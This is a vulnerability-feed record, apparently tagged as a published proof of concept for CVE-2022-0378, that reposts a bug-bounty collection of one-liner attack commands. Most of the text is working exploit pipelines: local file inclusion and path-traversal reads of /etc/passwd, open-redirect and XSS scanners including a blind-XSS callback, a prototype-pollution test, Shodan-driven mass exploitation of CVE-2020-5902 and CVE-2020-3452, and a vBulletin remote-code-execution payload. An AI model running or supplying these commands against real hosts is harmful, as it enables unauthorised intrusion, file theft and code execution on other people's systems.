{"uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/Secur_information_technology/50", "content": "Awesome One-liner Bug Bounty :\n\n> A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! 
%\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null\n\n### XSS\n> @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\" | head | grep -q \"Cisco\" && echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done < HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x\"|grep -qs 
\"onmouse\" && echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files", "creation_timestamp": "2024-05-19T19:36:04.000000Z"}